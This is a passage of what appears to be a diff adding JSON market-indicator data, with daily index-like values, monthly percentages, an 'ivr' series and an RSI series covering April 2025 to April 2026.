12985.400930621367 + ], + [ + "2025-10-23", + 13094.562429812166 + ], + [ + "2025-10-24", + 13234.389881338066 + ], + [ + "2025-10-27", + 13470.083866156661 + ], + [ + "2025-10-28", + 13573.66806744331 + ], + [ + "2025-10-29", + 13634.790003251237 + ], + [ + "2025-10-30", + 13426.332916785732 + ], + [ + "2025-10-31", + 13491.100436964887 + ], + [ + "2025-11-03", + 13555.652739060211 + ], + [ + "2025-11-04", + 13280.500355798798 + ], + [ + "2025-11-05", + 13366.928788732284 + ], + [ + "2025-11-06", + 13117.938525710195 + ], + [ + "2025-11-07", + 13076.547101429067 + ], + [ + "2025-11-10", + 13365.855322923908 + ], + [ + "2025-11-11", + 13330.255102325373 + ], + [ + "2025-11-12", + 13319.746160768565 + ], + [ + "2025-11-13", + 13047.810238016109 + ], + [ + "2025-11-14", + 13057.674837626813 + ], + [ + "2025-11-17", + 12946.155125651601 + ], + [ + "2025-11-18", + 12788.526251521043 + ], + [ + "2025-11-19", + 12864.874866759994 + ], + [ + "2025-11-20", + 12560.33996583413 + ], + [ + "2025-11-21", + 12654.702597150788 + ], + [ + "2025-11-24", + 12978.323667657349 + ], + [ + "2025-11-25", + 13058.317867267528 + ], + [ + "2025-11-26", + 13173.6983816978 + ], + [ + "2025-11-28", + 13280.500355798798 + ], + [ + "2025-12-01", + 13235.891158703324 + ], + [ + "2025-12-02", + 13339.476672295363 + ], + [ + "2025-12-03", + 13372.075650468772 + ], + [ + "2025-12-04", + 13359.636307684434 + ], + [ + "2025-12-05", + 13414.108792085224 + ], + [ + "2025-12-08", + 13388.374483402782 + ], + [ + "2025-12-09", + 13404.887222115232 + ], + [ + "2025-12-10", + 13459.788830378295 + ], + [ + "2025-12-11", + 13416.254411396585 + ], + [ + "2025-12-12", + 13159.759073853595 + ], + [ + "2025-12-15", + 13093.704182087622 + ], + [ + "2025-12-16", + 13119.653708853895 + ], + [ + "2025-12-17", + 12876.454649514399 + ], + [ + "2025-12-18", + 13063.036917447133 + ], + [ + "2025-12-19", + 13233.31772783508 + ], + [ + "2025-12-22", + 13296.751945738797 + ], + [ + "2025-12-23", + 13359.024773373061 + ], + [ + "2025-12-24", + 13398.107852474564 + ], + [ + "2025-12-26", + 13397.248292444632 + ], + [ + "2025-12-29", + 13332.398097025954 + ], + [ + "2025-12-30", + 13301.47493283457 + ], + [ + "2025-12-31", + 13191.52998732641 + ], + [ + "2026-01-02", + 13165.97677678768 + ], + [ + "2026-01-05", + 13270.553080948574 + ], + [ + "2026-01-06", + 13387.155351696203 + ], + [ + "2026-01-07", + 13400.040878312873 + ], + [ + "2026-01-08", + 13323.807745948176 + ], + [ + "2026-01-09", + 13456.515940737601 + ], + [ + "2026-01-12", + 13467.682347294403 + ], + [ + "2026-01-13", + 13447.71168388138 + ], + [ + "2026-01-14", + 13304.052300618981 + ], + [ + "2026-01-15", + 13351.939636576708 + ], + [ + "2026-01-16", + 13340.773230019904 + ], + [ + "2026-01-20", + 13057.319202866338 + ], + [ + "2026-01-21", + 13233.83346385304 + ], + [ + "2026-01-22", + 13330.035947325374 + ], + [ + "2026-01-23", + 13372.124205768172 + ], + [ + "2026-01-26", + 13430.96273019887 + ], + [ + "2026-01-27", + 13552.718424209936 + ], + [ + "2026-01-28", + 13597.597956215586 + ], + [ + "2026-01-29", + 13516.212712892842 + ], + [ + "2026-01-30", + 13353.871350109626 + ], + [ + "2026-02-02", + 13445.564752264629 + ], + [ + "2026-02-03", + 13238.986887116474 + ], + [ + "2026-02-04", + 13007.715371459522 + ], + [ + "2026-02-05", + 12820.46514008368 + ], + [ + "2026-02-06", + 13091.462764482849 + ], + [ + "2026-02-09", + 13191.745205410241 + ], + [ + "2026-02-10", + 13130.544531278963 + ], + [ + "2026-02-11", + 13165.761558703849 + ], + [ + "2026-02-12", + 12897.984331729805 + ], + [ + "2026-02-13", + 12925.470568106844 + ], + [ + "2026-02-17", + 12912.155917627902 + ], + [ + "2026-02-18", + 13008.573619184068 + ], + [ + "2026-02-19", + 12958.754569693423 + ], + [ + "2026-02-20", + 13073.425126908132 + ], + [ + "2026-02-23", + 12914.518067328485 + ], + [ + "2026-02-24", + 13053.239245411278 + ], + [ + "2026-02-25", + 13242.422502625432 + ], + [ + "2026-02-26", + 13082.658507626627 + ], + [ + "2026-02-27", + 13040.78415496227 + ], + [ + "2026-03-02", + 13057.96354481244 + ], + [ + "2026-03-03", + 12918.17021322666 + ], + [ + "2026-03-04", + 13115.084261488659 + ], + [ + "2026-03-05", + 13075.570746219495 + ], + [ + "2026-03-06", + 12878.871916041326 + ], + [ + "2026-03-09", + 13050.877095710697 + ], + [ + "2026-03-10", + 13051.092313794528 + ], + [ + "2026-03-11", + 13049.374506040049 + ], + [ + "2026-03-12", + 12825.403345263283 + ], + [ + "2026-03-13", + 12749.385430982415 + ], + [ + "2026-03-16", + 12892.40047229871 + ], + [ + "2026-03-17", + 12955.318954184466 + ], + [ + "2026-03-18", + 12774.726048048093 + ], + [ + "2026-03-19", + 12734.354285054384 + ], + [ + "2026-03-20", + 12499.001499636983 + ], + [ + "2026-03-23", + 12642.477160144892 + ], + [ + "2026-03-24", + 12556.04347798985 + ], + [ + "2026-03-25", + 12638.607171552107 + ], + [ + "2026-03-26", + 12336.950156344783 + ], + [ + "2026-03-27", + 12095.926899340599 + ], + [ + "2026-03-30", + 12003.473672365244 + ], + [ + "2026-03-31", + 12409.838222272381 + ], + [ + "2026-04-01", + 12563.139113229317 + ], + [ + "2026-04-02", + 12577.544289486696 + ], + [ + "2026-04-06", + 12653.227565893314 + ], + [ + "2026-04-07", + 12655.163216342402 + ], + [ + "2026-04-08", + 13031.42741753719 + ], + [ + "2026-04-09", + 13119.580219752099 + ], + [ + "2026-04-10", + 13138.501038853754 + ], + [ + "2026-04-13", + 13274.38632499046 + ], + [ + "2026-04-14", + 13515.409581994645 + ], + [ + "2026-04-15", + 13704.617773011192 + ], + [ + "2026-04-16", + 13770.624109477765 + ], + [ + "2026-04-17", + 13950.801014805758 + ], + [ + "2026-04-20", + 13906.509395614472 + ], + [ + "2026-04-21", + 13853.618239207683 + ], + [ + "2026-04-22", + 14085.39630474487 + ], + [ + "2026-04-23", + 14006.058257829296 + ] + ], + "monthly_pct": [ + [ + "2025-05-31", + 0.24662697723027982 + ], + [ + "2025-06-30", + 0.4291957168055749 + ], + [ + "2025-07-31", + 0.25838627887411203 + ], + [ + "2025-08-31", + 0.6746039908829715 + ], + [ + "2025-09-30", + 0.40948495094212944 + ], + [ + "2025-10-31", + 1.423879066328393 + ], + [ + "2025-11-30", + 2.376773007628974 + ], + [ + "2025-12-31", + 1.647773892242821 + ], + [ + "2026-01-31", + 1.0675269113344488 + ], + [ + "2026-02-28", + 1.2237720818256248 + ], + [ + "2026-03-31", + 1.7595161445569385 + ], + [ + "2026-04-30", + 1.2192381513162598 + ] + ], + "ivr": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 50.0 + ], + [ + "2025-04-29", + 50.0 + ], + [ + "2025-04-30", + 50.0 + ], + [ + "2025-05-01", + 50.0 + ], + [ + "2025-05-02", + 50.0 + ], + [ + "2025-05-05", + 50.0 + ], + [ + "2025-05-06", + 50.0 + ], + [ + "2025-05-07", + 50.0 + ], + [ + "2025-05-08", + 50.0 + ], + [ + "2025-05-09", + 50.0 + ], + [ + "2025-05-12", + 50.0 + ], + [ + "2025-05-13", + 50.0 + ], + [ + "2025-05-14", + 50.0 + ], + [ + "2025-05-15", + 50.0 + ], + [ + "2025-05-16", + 50.0 + ], + [ + "2025-05-19", + 50.0 + ], + [ + "2025-05-20", + 50.0 + ], + [ + "2025-05-21", + 50.0 + ], + [ + "2025-05-22", + 50.0 + ], + [ + "2025-05-23", + 100.0 + ], + [ + "2025-05-27", + 100.0 + ], + [ + "2025-05-28", + 100.0 + ], + [ + "2025-05-29", + 98.13561559872142 + ], + [ + "2025-05-30", + 94.47720660886101 + ], + [ + "2025-06-02", + 72.1085878224666 + ], + [ + "2025-06-03", + 59.36005567208219 + ], + [ + "2025-06-04", + 25.53062633396632 + ], + [ + "2025-06-05", + 51.95938637699871 + ], + [ + "2025-06-06", + 51.11637598394567 + ], + [ + "2025-06-09", + 48.08639902145938 + ], + [ + "2025-06-10", + 0.0 + ], + [ + "2025-06-11", + 0.0 + ], + [ + "2025-06-12", + 0.0 + ], + [ + "2025-06-13", + 12.569576152891118 + ], + [ + "2025-06-16", + 22.30432786608082 + ], + [ + "2025-06-17", + 29.31678206861723 + ], + [ + "2025-06-18", + 28.357556985156307 + ], + [ + "2025-06-20", + 16.536106939502183 + ], + [ + "2025-06-23", + 21.638165576941127 + ], + [ + "2025-06-24", + 23.336446241210705 + ], + [ + "2025-06-25", + 0.0 + ], + [ + "2025-06-26", + 0.5122915578033982 + ], + [ + "2025-06-27", + 0.49264825824235053 + ], + [ + "2025-06-30", + 0.017754392087460852 + ], + [ + "2025-07-01", + 6.550021382314624 + ], + [ + "2025-07-02", + 5.7818346624187535 + ], + [ + "2025-07-03", + 9.058649664618924 + ], + [ + "2025-07-07", + 8.619707469735708 + ], + [ + "2025-07-08", + 5.320521886069647 + ], + [ + "2025-07-09", + 6.800754710772876 + ], + [ + "2025-07-10", + 6.409646896057747 + ], + [ + "2025-07-11", + 5.828119709487022 + ], + [ + "2025-07-14", + 5.991912215980306 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.3412486482050157 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.8131657920205329 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 1.5541878505887974 + ], + [ + "2025-08-01", + 21.81521575537059 + ], + [ + "2025-08-04", + 34.32350685038711 + ], + [ + "2025-08-05", + 36.92066779584022 + ], + [ + "2025-08-06", + 41.10072763075662 + ], + [ + "2025-08-07", + 41.07130106834973 + ], + [ + "2025-08-08", + 42.78569940858683 + ], + [ + "2025-08-11", + 43.42396793098516 + ], + [ + "2025-08-12", + 47.84241275380744 + ], + [ + "2025-08-13", + 47.8842769708396 + ], + [ + "2025-08-14", + 46.73315718624761 + ], + [ + "2025-08-15", + 47.92634592726185 + ], + [ + "2025-08-18", + 47.43892950053845 + ], + [ + "2025-08-19", + 53.85171927540961 + ], + [ + "2025-08-20", + 54.75499524363522 + ], + [ + "2025-08-21", + 55.30977313282018 + ], + [ + "2025-08-22", + 62.86954173523408 + ], + [ + "2025-08-25", + 62.89927751881971 + ], + [ + "2025-08-26", + 63.23915705734174 + ], + [ + "2025-08-27", + 63.261645511191034 + ], + [ + "2025-08-28", + 62.9691974626696 + ], + [ + "2025-08-29", + 53.454115255610525 + ], + [ + "2025-09-02", + 44.98075557956612 + ], + [ + "2025-09-03", + 45.01595252229214 + ], + [ + "2025-09-04", + 42.24181101542073 + ], + [ + "2025-09-05", + 41.92388353829351 + ], + [ + "2025-09-08", + 39.64859063945318 + ], + [ + "2025-09-09", + 39.41095830861168 + ], + [ + "2025-09-10", + 33.102474900457565 + ], + [ + "2025-09-11", + 34.46197285483563 + ], + [ + "2025-09-12", + 35.04087335528709 + ], + [ + "2025-09-15", + 36.32660784332077 + ], + [ + "2025-09-16", + 36.39989989243485 + ], + [ + "2025-09-17", + 26.677355017826432 + ], + [ + "2025-09-18", + 25.809927951577645 + ], + [ + "2025-09-19", + 23.889584064768513 + ], + [ + "2025-09-22", + 16.36230846143909 + ], + [ + "2025-09-23", + 19.377757699491447 + ], + [ + "2025-09-24", + 20.952608752195477 + ], + [ + "2025-09-25", + 22.98308380871313 + ], + [ + "2025-09-26", + 22.247783006591266 + ], + [ + "2025-09-29", + 11.761515520366885 + ], + [ + "2025-09-30", + 3.7909966693881185 + ], + [ + "2025-10-01", + 2.343159660331236 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 3.2993845265208925 + ], + [ + "2025-10-06", + 4.703853818812907 + ], + [ + "2025-10-07", + 8.434786659042675 + ], + [ + "2025-10-08", + 13.229906863480487 + ], + [ + "2025-10-09", + 13.392926815515317 + ], + [ + "2025-10-10", + 67.23151340804776 + ], + [ + "2025-10-13", + 78.29159810111658 + ], + [ + "2025-10-14", + 79.84517126753707 + ], + [ + "2025-10-15", + 80.65718757047176 + ], + [ + "2025-10-16", + 79.22435471892757 + ], + [ + "2025-10-17", + 79.13011196914303 + ], + [ + "2025-10-20", + 82.50050598966912 + ], + [ + "2025-10-21", + 80.90841328037503 + ], + [ + "2025-10-22", + 83.57794197877053 + ], + [ + "2025-10-23", + 84.23782396964661 + ], + [ + "2025-10-24", + 86.25636011307296 + ], + [ + "2025-10-27", + 92.74003469528537 + ], + [ + "2025-10-28", + 93.44048050445981 + ], + [ + "2025-10-29", + 93.39505259461967 + ], + [ + "2025-10-30", + 100.0 + ], + [ + "2025-10-31", + 99.21398009347268 + ], + [ + "2025-11-03", + 98.63652246735433 + ], + [ + "2025-11-04", + 100.0 + ], + [ + "2025-11-05", + 98.37477162514631 + ], + [ + "2025-11-06", + 100.0 + ], + [ + "2025-11-07", + 73.0346634401549 + ], + [ + "2025-11-10", + 73.67990647473897 + ], + [ + "2025-11-11", + 72.42923210122146 + ], + [ + "2025-11-12", + 71.92524803766436 + ], + [ + "2025-11-13", + 82.18137459575009 + ], + [ + "2025-11-14", + 81.42459867502811 + ], + [ + "2025-11-17", + 79.3844308102455 + ], + [ + "2025-11-18", + 82.09644948582937 + ], + [ + "2025-11-19", + 81.3237819458552 + ], + [ + "2025-11-20", + 90.16708665248736 + ], + [ + "2025-11-21", + 88.78153620916872 + ], + [ + "2025-11-24", + 96.0741311196572 + ], + [ + "2025-11-25", + 95.53277680961365 + ], + [ + "2025-11-26", + 97.01321252529088 + ], + [ + "2025-11-28", + 94.51668269866119 + ], + [ + "2025-12-01", + 93.99177760163646 + ], + [ + "2025-12-02", + 94.88583692714684 + ], + [ + "2025-12-03", + 86.68114383297082 + ], + [ + "2025-12-04", + 85.83581894595552 + ], + [ + "2025-12-05", + 77.97573305691738 + ], + [ + "2025-12-08", + 77.73359919510793 + ], + [ + "2025-12-09", + 66.92527534234797 + ], + [ + "2025-12-10", + 67.02433735564968 + ], + [ + "2025-12-11", + 67.30668918849052 + ], + [ + "2025-12-12", + 66.23808621024848 + ], + [ + "2025-12-15", + 66.92843086997097 + ], + [ + "2025-12-16", + 65.00205246295562 + ], + [ + "2025-12-17", + 70.20682002561249 + ], + [ + "2025-12-18", + 74.09111802684599 + ], + [ + "2025-12-19", + 61.22146223177235 + ], + [ + "2025-12-22", + 60.689737178709876 + ], + [ + "2025-12-23", + 45.162905472762475 + ], + [ + "2025-12-24", + 44.498003464102645 + ], + [ + "2025-12-26", + 42.62844085650989 + ], + [ + "2025-12-29", + 42.023604860434176 + ], + [ + "2025-12-30", + 41.91240311111995 + ], + [ + "2025-12-31", + 42.05285563169242 + ], + [ + "2026-01-02", + 41.8121452455143 + ], + [ + "2026-01-05", + 44.1954617468542 + ], + [ + "2026-01-06", + 46.23619294987501 + ], + [ + "2026-01-07", + 46.15611332256563 + ], + [ + "2026-01-08", + 47.08321766756964 + ], + [ + "2026-01-09", + 49.553375108084126 + ], + [ + "2026-01-12", + 49.275039881633134 + ], + [ + "2026-01-13", + 36.52475277009828 + ], + [ + "2026-01-14", + 39.79257789257108 + ], + [ + "2026-01-15", + 39.97824660378971 + ], + [ + "2026-01-16", + 25.961074224979917 + ], + [ + "2026-01-20", + 36.700880633580034 + ], + [ + "2026-01-21", + 36.82328502504084 + ], + [ + "2026-01-22", + 38.000076798973495 + ], + [ + "2026-01-23", + 37.5534991851978 + ], + [ + "2026-01-26", + 37.94621828817599 + ], + [ + "2026-01-27", + 40.414271760050816 + ], + [ + "2026-01-28", + 39.563222201778004 + ], + [ + "2026-01-29", + 40.73366614752425 + ], + [ + "2026-01-30", + 43.300917250747545 + ], + [ + "2026-02-02", + 44.166793240209266 + ], + [ + "2026-02-03", + 50.20821548685122 + ], + [ + "2026-02-04", + 55.498697154177755 + ], + [ + "2026-02-05", + 59.41740156746667 + ], + [ + "2026-02-06", + 71.56155563235508 + ], + [ + "2026-02-09", + 70.59179207947432 + ], + [ + "2026-02-10", + 70.78339399077109 + ], + [ + "2026-02-11", + 71.11178524914793 + ], + [ + "2026-02-12", + 77.59012619229065 + ], + [ + "2026-02-13", + 77.22311488106627 + ], + [ + "2026-02-17", + 77.23937617691227 + ], + [ + "2026-02-18", + 69.29806831415462 + ], + [ + "2026-02-19", + 64.73399898254716 + ], + [ + "2026-02-20", + 65.19367405893584 + ], + [ + "2026-02-23", + 67.57669022051013 + ], + [ + "2026-02-24", + 70.43430707757365 + ], + [ + "2026-02-25", + 73.60247227749404 + ], + [ + "2026-02-26", + 75.47469360490224 + ], + [ + "2026-02-27", + 75.1549513906598 + ], + [ + "2026-03-02", + 72.67657976451194 + ], + [ + "2026-03-03", + 72.9575717063375 + ], + [ + "2026-03-04", + 74.38767913365116 + ], + [ + "2026-03-05", + 67.29979286509511 + ], + [ + "2026-03-06", + 67.98428420488688 + ], + [ + "2026-03-09", + 61.35452631685669 + ], + [ + "2026-03-10", + 59.649236516755224 + ], + [ + "2026-03-11", + 59.192761298214656 + ], + [ + "2026-03-12", + 65.69599626042604 + ], + [ + "2026-03-13", + 56.56398744333069 + ], + [ + "2026-03-16", + 60.09721738644881 + ], + [ + "2026-03-17", + 60.74257353781537 + ], + [ + "2026-03-18", + 64.20724736816484 + ], + [ + "2026-03-19", + 64.10638983723959 + ], + [ + "2026-03-20", + 69.20027736240552 + ], + [ + "2026-03-23", + 70.85692094082732 + ], + [ + "2026-03-24", + 67.93703826441349 + ], + [ + "2026-03-25", + 63.163851202339515 + ], + [ + "2026-03-26", + 72.17251066132836 + ], + [ + "2026-03-27", + 78.4470858208666 + ], + [ + "2026-03-30", + 78.11586250677955 + ], + [ + "2026-03-31", + 100.0 + ], + [ + "2026-04-01", + 98.53021413123079 + ], + [ + "2026-04-02", + 98.66221164017374 + ], + [ + "2026-04-06", + 96.24742991307319 + ], + [ + "2026-04-07", + 92.50708130182332 + ], + [ + "2026-04-08", + 100.0 + ], + [ + "2026-04-09", + 100.0 + ], + [ + "2026-04-10", + 95.07542222391638 + ], + [ + "2026-04-13", + 95.2257295893731 + ], + [ + "2026-04-14", + 97.98210849688171 + ], + [ + "2026-04-15", + 99.92799313663575 + ], + [ + "2026-04-16", + 95.13746310114315 + ], + [ + "2026-04-17", + 95.52925539340924 + ], + [ + "2026-04-20", + 87.07640716837697 + ], + [ + "2026-04-21", + 87.66358558517055 + ], + [ + "2026-04-22", + 87.24541567480185 + ], + [ + "2026-04-23", + 89.23358539104339 + ] + ], + "rsi": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 99.77900043323504 + ], + [ + "2025-04-29", + 99.78942379381995 + ], + [ + "2025-04-30", + 99.69197754765088 + ], + [ + "2025-05-01", + 99.72219369075754 + ], + [ + "2025-05-02", + 99.75232021739862 + ], + [ + "2025-05-05", + 95.24096205263943 + ], + [ + "2025-05-06", + 88.5212339656073 + ], + [ + "2025-05-07", + 88.87469547970268 + ], + [ + "2025-05-08", + 89.7703548424889 + ], + [ + "2025-05-09", + 89.27392371653309 + ], + [ + "2025-05-12", + 92.17027986279837 + ], + [ + "2025-05-13", + 92.9665954445156 + ], + [ + "2025-05-14", + 93.2612448709655 + ], + [ + "2025-05-15", + 93.31687798967539 + ], + [ + "2025-05-16", + 93.54439048768941 + ], + [ + "2025-05-19", + 93.59632763838819 + ], + [ + "2025-05-20", + 90.85678489894168 + ], + [ + "2025-05-21", + 80.33444487615895 + ], + [ + "2025-05-22", + 80.65481940501168 + ], + [ + "2025-05-23", + 74.20032161325395 + ], + [ + "2025-05-27", + 78.79888075439318 + ], + [ + "2025-05-28", + 75.98648071184175 + ], + [ + "2025-05-29", + 76.38726079947163 + ], + [ + "2025-05-30", + 75.29914048773763 + ], + [ + "2025-06-02", + 77.05862196107273 + ], + [ + "2025-06-03", + 78.6893020098816 + ], + [ + "2025-06-04", + 79.25993809975407 + ], + [ + "2025-06-05", + 73.52001026625234 + ], + [ + "2025-06-06", + 75.93875948495021 + ], + [ + "2025-06-09", + 76.29333360716906 + ], + [ + "2025-06-10", + 77.87351259486199 + ], + [ + "2025-06-11", + 75.10861276866287 + ], + [ + "2025-06-12", + 75.75239537096746 + ], + [ + "2025-06-13", + 65.91175901999759 + ], + [ + "2025-06-16", + 70.43652495116987 + ], + [ + "2025-06-17", + 63.93997138386086 + ], + [ + "2025-06-18", + 63.83040677443252 + ], + [ + "2025-06-20", + 61.124285227253566 + ], + [ + "2025-06-23", + 65.11837266364682 + ], + [ + "2025-06-24", + 70.09047714108726 + ], + [ + "2025-06-25", + 70.84998350823346 + ], + [ + "2025-06-26", + 73.50668297107767 + ], + [ + "2025-06-27", + 74.43402937273964 + ], + [ + "2025-06-30", + 76.14136429253458 + ], + [ + "2025-07-01", + 69.5861052001146 + ], + [ + "2025-07-02", + 71.73342597211915 + ], + [ + "2025-07-03", + 74.4924446325237 + ], + [ + "2025-07-07", + 68.8941500927572 + ], + [ + "2025-07-08", + 69.07933066434575 + ], + [ + "2025-07-09", + 71.39226046417842 + ], + [ + "2025-07-10", + 70.23468493587721 + ], + [ + "2025-07-11", + 68.36906260787869 + ], + [ + "2025-07-14", + 69.75997723383126 + ], + [ + "2025-07-15", + 70.11896637792434 + ], + [ + "2025-07-16", + 70.53998485589375 + ], + [ + "2025-07-17", + 73.69756133171717 + ], + [ + "2025-07-18", + 72.69297544481948 + ], + [ + "2025-07-21", + 74.69493714878962 + ], + [ + "2025-07-22", + 69.2117434195171 + ], + [ + "2025-07-23", + 71.2072835039679 + ], + [ + "2025-07-24", + 72.11956865033422 + ], + [ + "2025-07-25", + 73.157563707422 + ], + [ + "2025-07-28", + 74.48870042384041 + ], + [ + "2025-07-29", + 72.5620290033899 + ], + [ + "2025-07-30", + 73.20667304197852 + ], + [ + "2025-07-31", + 66.53941897373642 + ], + [ + "2025-08-01", + 48.83034624287794 + ], + [ + "2025-08-04", + 59.491450794343685 + ], + [ + "2025-08-05", + 54.877042742764935 + ], + [ + "2025-08-06", + 60.890449107605235 + ], + [ + "2025-08-07", + 62.36152495806013 + ], + [ + "2025-08-08", + 66.15342223337063 + ], + [ + "2025-08-11", + 63.932714089217086 + ], + [ + "2025-08-12", + 68.72175247819038 + ], + [ + "2025-08-13", + 68.90087529806746 + ], + [ + "2025-08-14", + 68.24782661055676 + ], + [ + "2025-08-15", + 64.51588686427213 + ], + [ + "2025-08-18", + 64.17496737244183 + ], + [ + "2025-08-19", + 53.76141658954568 + ], + [ + "2025-08-20", + 49.9903644643022 + ], + [ + "2025-08-21", + 47.22506949739448 + ], + [ + "2025-08-22", + 55.93214238095977 + ], + [ + "2025-08-25", + 54.106766575003306 + ], + [ + "2025-08-26", + 56.24123921769192 + ], + [ + "2025-08-27", + 57.06759403187485 + ], + [ + "2025-08-28", + 60.356543077778014 + ], + [ + "2025-08-29", + 52.324235849716956 + ], + [ + "2025-09-02", + 47.45728432623878 + ], + [ + "2025-09-03", + 51.93922469391317 + ], + [ + "2025-09-04", + 56.565664539737035 + ], + [ + "2025-09-05", + 57.27805114035938 + ], + [ + "2025-09-08", + 59.68872188057929 + ], + [ + "2025-09-09", + 61.069497401299174 + ], + [ + "2025-09-10", + 61.23512797213832 + ], + [ + "2025-09-11", + 64.15697072655509 + ], + [ + "2025-09-12", + 66.24822821718155 + ], + [ + "2025-09-15", + 69.92512911351736 + ], + [ + "2025-09-16", + 69.11755090562326 + ], + [ + "2025-09-17", + 67.14641385534298 + ], + [ + "2025-09-18", + 71.14214005347664 + ], + [ + "2025-09-19", + 73.74692384834523 + ], + [ + "2025-09-22", + 75.81663111764769 + ], + [ + "2025-09-23", + 69.18690485218133 + ], + [ + "2025-09-24", + 65.9274507910028 + ], + [ + "2025-09-25", + 62.073416118662806 + ], + [ + "2025-09-26", + 64.21244617171038 + ], + [ + "2025-09-29", + 66.51318126535418 + ], + [ + "2025-09-30", + 67.8363848206827 + ], + [ + "2025-10-01", + 70.07271359229502 + ], + [ + "2025-10-02", + 71.88552756870807 + ], + [ + "2025-10-03", + 67.36700670972712 + ], + [ + "2025-10-06", + 70.87002948154405 + ], + [ + "2025-10-07", + 65.51953458737353 + ], + [ + "2025-10-08", + 70.68182572371272 + ], + [ + "2025-10-09", + 69.48544840344022 + ], + [ + "2025-10-10", + 45.648488206639165 + ], + [ + "2025-10-13", + 55.376537018856936 + ], + [ + "2025-10-14", + 52.15415071870055 + ], + [ + "2025-10-15", + 55.114256998387056 + ], + [ + "2025-10-16", + 53.23979861930128 + ], + [ + "2025-10-17", + 56.08188810633946 + ], + [ + "2025-10-20", + 61.011024987288984 + ], + [ + "2025-10-21", + 60.85647697071518 + ], + [ + "2025-10-22", + 55.299321895482464 + ], + [ + "2025-10-23", + 58.800577210141036 + ], + [ + "2025-10-24", + 62.818020967360994 + ], + [ + "2025-10-27", + 68.40981956088605 + ], + [ + "2025-10-28", + 70.50894789771353 + ], + [ + "2025-10-29", + 71.70377125676691 + ], + [ + "2025-10-30", + 62.41596078264208 + ], + [ + "2025-10-31", + 63.97721602395874 + ], + [ + "2025-11-03", + 65.51481189872271 + ], + [ + "2025-11-04", + 54.78126588329531 + ], + [ + "2025-11-05", + 57.15572432216909 + ], + [ + "2025-11-06", + 49.148740140966986 + ], + [ + "2025-11-07", + 47.94626337299615 + ], + [ + "2025-11-10", + 56.04170006389771 + ], + [ + "2025-11-11", + 54.91003811705388 + ], + [ + "2025-11-12", + 54.55979539845308 + ], + [ + "2025-11-13", + 46.32544637715113 + ], + [ + "2025-11-14", + 46.64005417460644 + ], + [ + "2025-11-17", + 43.533482947161744 + ], + [ + "2025-11-18", + 39.525980976991 + ], + [ + "2025-11-19", + 42.29675216038561 + ], + [ + "2025-11-20", + 35.341171889856284 + ], + [ + "2025-11-21", + 38.704744890543516 + ], + [ + "2025-11-24", + 48.58339982827871 + ], + [ + "2025-11-25", + 50.69853054968624 + ], + [ + "2025-11-26", + 53.65962370167809 + ], + [ + "2025-11-28", + 56.27738377571837 + ], + [ + "2025-12-01", + 54.8828258511313 + ], + [ + "2025-12-02", + 57.51547351992594 + ], + [ + "2025-12-03", + 58.339358248337405 + ], + [ + "2025-12-04", + 57.87811693989382 + ], + [ + "2025-12-05", + 59.39216887733936 + ], + [ + "2025-12-08", + 58.32554378095445 + ], + [ + "2025-12-09", + 58.836386712695784 + ], + [ + "2025-12-10", + 60.56710640401983 + ], + [ + "2025-12-11", + 58.46786282216704 + ], + [ + "2025-12-12", + 47.92776599970523 + ], + [ + "2025-12-15", + 45.6456537301126 + ], + [ + "2025-12-16", + 46.71897934905381 + ], + [ + "2025-12-17", + 38.955101542245885 + ], + [ + "2025-12-18", + 46.32483668067323 + ], + [ + "2025-12-19", + 52.01808475188087 + ], + [ + "2025-12-22", + 53.976517988523405 + ], + [ + "2025-12-23", + 55.880326068533144 + ], + [ + "2025-12-24", + 57.08030921295068 + ], + [ + "2025-12-26", + 57.04356223624234 + ], + [ + "2025-12-29", + 54.2081286945739 + ], + [ + "2025-12-30", + 52.85889179922021 + ], + [ + "2025-12-31", + 48.25967181424843 + ], + [ + "2026-01-02", + 47.23106648672097 + ], + [ + "2026-01-05", + 51.762367270417684 + ], + [ + "2026-01-06", + 56.27126034784019 + ], + [ + "2026-01-07", + 56.752350324000496 + ], + [ + "2026-01-08", + 53.034882367080336 + ], + [ + "2026-01-09", + 58.17146939082154 + ], + [ + "2026-01-12", + 58.58194683252798 + ], + [ + "2026-01-13", + 57.495240197991365 + ], + [ + "2026-01-14", + 50.270999212851436 + ], + [ + "2026-01-15", + 52.41725362037154 + ], + [ + "2026-01-16", + 51.85524676332916 + ], + [ + "2026-01-20", + 40.10138448790616 + ], + [ + "2026-01-21", + 48.00508721027947 + ], + [ + "2026-01-22", + 51.742489878188415 + ], + [ + "2026-01-23", + 53.32326066998696 + ], + [ + "2026-01-26", + 55.51699297422085 + ], + [ + "2026-01-27", + 59.734259087372756 + ], + [ + "2026-01-28", + 61.19465996197734 + ], + [ + "2026-01-29", + 57.14693180407697 + ], + [ + "2026-01-30", + 50.03711689954666 + ], + [ + "2026-02-02", + 53.55211355370052 + ], + [ + "2026-02-03", + 45.74406414181343 + ], + [ + "2026-02-04", + 38.90503047092173 + ], + [ + "2026-02-05", + 34.41826043180623 + ], + [ + "2026-02-06", + 44.410222785042755 + ], + [ + "2026-02-09", + 47.59227471354711 + ], + [ + "2026-02-10", + 45.86673044621205 + ], + [ + "2026-02-11", + 47.05628731320214 + ], + [ + "2026-02-12", + 39.880253340706396 + ], + [ + "2026-02-13", + 40.876920604446696 + ], + [ + "2026-02-17", + 40.52643464355067 + ], + [ + "2026-02-18", + 44.253940355000054 + ], + [ + "2026-02-19", + 42.76258333527966 + ], + [ + "2026-02-20", + 47.175317273300905 + ], + [ + "2026-02-23", + 42.307633023386686 + ], + [ + "2026-02-24", + 47.40917873772802 + ], + [ + "2026-02-25", + 53.454085495848986 + ], + [ + "2026-02-26", + 48.39511574134616 + ], + [ + "2026-02-27", + 47.13593751194768 + ], + [ + "2026-03-02", + 47.73673283234952 + ], + [ + "2026-03-03", + 43.413087301575196 + ], + [ + "2026-03-04", + 50.24869036782506 + ], + [ + "2026-03-05", + 48.970346583733836 + 